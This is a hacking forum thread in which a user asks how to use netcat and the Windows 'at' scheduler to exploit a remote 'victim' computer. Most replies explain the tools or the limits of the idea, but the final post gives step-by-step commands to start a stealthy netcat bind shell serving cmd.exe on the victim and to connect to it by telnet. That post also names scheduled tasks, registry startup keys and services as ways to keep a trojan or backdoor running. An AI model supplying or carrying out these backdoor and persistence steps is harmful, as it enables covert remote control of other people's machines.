Benny1123

Netcat and at command

7 posts in this topic

Does anyone know how to use netcat and the at command to exploit a remote computer? Perhaps somehow it might be possible to telnet from the victims computer by scheduling it with the at command on your own computer?

0

Share this post


Link to post
Share on other sites

knowing how to do your own research will pay off in the end... search online for any and every bit of documentation on the subject of netcat... i think that once you master this tool to its full extent it will be like wetting your pickle for the first time...

at command is what you use with windows to schedule task...

Edited by 1qwert
0

Share this post


Link to post
Share on other sites
knowing how to do your own research will pay off in the end... search online for any and every bit of documentation on the subject of netcat...

I have.... and have found results but not into the extent of what I am asking.....

at command is what you use with windows to schedule task...

Yes.... A computer can use the at command to run an application on a remote computer. The benefit of this is that it is a Microsoft service. It can also be started remotely if not already started and nothing will alert the user because hey, its using a Microsoft tool. The idea behind this is to not upload anything on the targets machine, just use the at command to schedule the computer to telnet your machine and let netcat listen for the connection.

0

Share this post


Link to post
Share on other sites

I think your thinking about "remote" too "remotely." The AT command will work on remote computers on the same network as yourself, generally within the same domain. Run->cmd-> at \\[network path and name of computer].

If you are not on the same network, even a basic home peer-to-peer will let you use the at command, then you need to Remote in, which is highly unlikely that any hackable network will have that enabled for you, and run those commands yourself. If you are this far already then you have complete access to this machine with all of its security privileges and have already hacked it so you could telenet, run malicious code, etc as far as the machines security privileges allow.

I don't know what you mean about using netcap. You seem to be tying AT and netcap together too strongly. Netcap will let you make your own packets but you can't force a target machine to accept a packet or do what the packet wants the machine to do...again on any well protected machine...less protected machines have known flaws which you can play around with.

Hope that helps...

-----Phail_Saph-----

0

Share this post


Link to post
Share on other sites

Moved to Nubie HQ.

In order for something like you have described to work, you would need to run netcat on the remote machine and then initiate a connection from your own machine; you have explained it the other way around. There are plenty of how-to guides on doing something like this -- in fact, I believe the exact process is described in the netcat docs.

The "at" command is just a task scheduler for Windows. It has nothing at all to do with what you're describing, at least not directly.

0

Share this post


Link to post
Share on other sites

AT commands can also refer to modem control commands. Like going into the serial comm of a GSM baseband modem and playing with AT Commands :D

0

Share this post


Link to post
Share on other sites

a hacker will use the AT command to skedule task, this is one way of keeping your trojin, shell or backdoor always running on the client...

a hacker will use the registry to keep a trojin, shell or backdoor starting up when windows first boots up...

a hacker will also use the SC command to start a trojin up as a service...

here is a small set of instructions for you, that is if you dont know how to use netcat as remote controle... you need 2 computers for this... both computers need netcat located some were on the hard drive(at leas the victim does)...

for this test, place netcat on computer 1 in this directory c:/hacked/nc.exe this will be your victim

on the victim computer open a command promp and execute these 3 commands

ipconfig

cd/hacked/

nc -l -p 666 -e cmd.exe -d

this will start netcat in a stealthy way, if you check the taskmanager you will see netcat is running...

now, from the attacking computer you need to execute this command, take note of the ip address of the victims ipconfig

telnet 192.168.1.5 666

netcat is your remote control (shell, backdoor) you need to understand why you would need to use one of the tools above to keep netcat running...

0

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!


Register a new account

Sign in

Already have an account? Sign in here.


Sign In Now